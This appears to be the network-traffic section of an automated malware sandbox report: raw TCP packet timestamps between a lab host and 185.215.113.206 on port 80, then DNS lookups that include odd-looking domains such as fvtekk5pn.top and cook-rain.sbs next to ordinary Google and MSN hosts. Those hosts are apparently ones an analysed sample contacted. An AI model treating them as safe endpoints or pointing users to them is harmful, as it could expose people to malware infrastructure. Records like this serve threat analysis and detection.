                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200064898 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200078964 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200090885 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200103998 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200109959 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200109959 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200118065 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200129986 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200141907 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200155020 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200155020 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200184107 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200203896 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200216055 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200227976 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200227976 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200227976 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200242043 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200256109 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200293064 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200293064 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200293064 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200336933 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200350046 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200367928 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200381041 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200392008 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200402975 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200402975 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200402975 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200418949 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200421095 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200432062 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200447083 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200556040 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200556040 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.200556040 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.240041018 CET4434999213.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.240053892 CET4434999213.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.240113020 CET4434999213.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.240140915 CET49992443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.240199089 CET49992443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.251570940 CET50006443192.168.2.620.189.173.9
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.251588106 CET4435000620.189.173.9192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.252160072 CET50006443192.168.2.620.189.173.9
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.252960920 CET50006443192.168.2.620.189.173.9
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.252969980 CET4435000620.189.173.9192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.255561113 CET50007443192.168.2.620.189.173.9
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.255585909 CET4435000720.189.173.9192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.255672932 CET50007443192.168.2.620.189.173.9
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.256191015 CET50007443192.168.2.620.189.173.9
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.256201029 CET4435000720.189.173.9192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.263487101 CET49992443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.263495922 CET4434999213.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.283931017 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.283942938 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.283967018 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.283983946 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.283992052 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.283994913 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284008026 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284029007 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284041882 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284053087 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284065008 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284075975 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284090042 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284090042 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284104109 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284111023 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284130096 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284140110 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284143925 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284157038 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284168959 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284204960 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284204960 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284204960 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284210920 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284216881 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284224987 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284236908 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284246922 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284259081 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284367085 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284384966 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284395933 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284401894 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284401894 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284401894 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284401894 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284404993 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284416914 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284436941 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284446955 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284452915 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284461975 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284475088 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284485102 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284490108 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284490108 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284490108 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284501076 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284521103 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284540892 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284550905 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284560919 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284560919 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284560919 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284564972 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284598112 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284610987 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284621954 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284621954 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284621954 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284650087 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284663916 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284676075 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284710884 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284719944 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284719944 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284719944 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284719944 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284730911 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284743071 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284753084 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284765005 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284776926 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284807920 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284807920 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284807920 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284807920 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284833908 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284853935 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284863949 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284876108 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284887075 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284898996 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284921885 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284934044 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284940958 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284940958 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284940958 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284940958 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284965038 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.284979105 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285017014 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285027981 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285060883 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285060883 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285060883 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285060883 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285062075 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285073996 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285087109 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285099030 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285129070 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285129070 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285140991 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285151958 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285160065 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285164118 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285185099 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285196066 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285197020 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285197020 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285209894 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285223961 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285253048 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285264015 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285274982 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285274982 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285274982 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285274982 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285571098 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285680056 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285690069 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285799026 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285809994 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285823107 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285840988 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285851955 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285861015 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285861015 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285861015 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285865068 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285969019 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285979033 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.285989046 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.286010027 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.286010027 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.286010027 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.286031008 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.286042929 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.286053896 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.286066055 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.286102057 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.286102057 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.286102057 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.286102057 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.286115885 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.286128998 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.286140919 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.286151886 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.286163092 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.286174059 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.286194086 CET4991080192.168.2.6185.215.113.206

                                                                                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.036432981 CET192.168.2.61.1.1.10x6629Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.036613941 CET192.168.2.61.1.1.10x9c5fStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.814418077 CET192.168.2.61.1.1.10x3f52Standard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.814593077 CET192.168.2.61.1.1.10x4867Standard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.819036961 CET192.168.2.61.1.1.10x50ceStandard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.819188118 CET192.168.2.61.1.1.10xe065Standard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:33.485933065 CET192.168.2.61.1.1.10x6fd3Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:33.486103058 CET192.168.2.61.1.1.10xaa7bStandard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.503276110 CET192.168.2.61.1.1.10x9fe5Standard query (0)deff.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.503437996 CET192.168.2.61.1.1.10x127cStandard query (0)deff.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.464845896 CET192.168.2.61.1.1.10x364aStandard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.464973927 CET192.168.2.61.1.1.10xb79Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.500536919 CET192.168.2.61.1.1.10x7f8eStandard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.500742912 CET192.168.2.61.1.1.10x64d5Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.501538992 CET192.168.2.61.1.1.10x242dStandard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.501606941 CET192.168.2.61.1.1.10x9d71Standard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.526453972 CET192.168.2.61.1.1.10x9ff3Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.526582956 CET192.168.2.61.1.1.10x724eStandard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.929172993 CET192.168.2.61.1.1.10x4ea8Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.929470062 CET192.168.2.61.1.1.10x8334Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.932133913 CET192.168.2.61.1.1.10xa374Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.933128119 CET192.168.2.61.1.1.10xba72Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.954376936 CET192.168.2.61.1.1.10x6dceStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.954524040 CET192.168.2.61.1.1.10x7519Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:12.383872986 CET192.168.2.61.1.1.10xb75aStandard query (0)home.fvtekk5pn.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:12.384413958 CET192.168.2.61.1.1.10xcabeStandard query (0)home.fvtekk5pn.top28IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:17.077851057 CET192.168.2.61.1.1.10xb356Standard query (0)cook-rain.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:27.762453079 CET192.168.2.61.1.1.10x234eStandard query (0)fvtekk5pn.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:27.762557983 CET192.168.2.61.1.1.10x9465Standard query (0)fvtekk5pn.top28IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:27.976200104 CET192.168.2.61.1.1.10x6c79Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:27.976428032 CET192.168.2.61.1.1.10x44eaStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.028745890 CET192.168.2.61.1.1.10xcd42Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.029233932 CET192.168.2.61.1.1.10xbedbStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
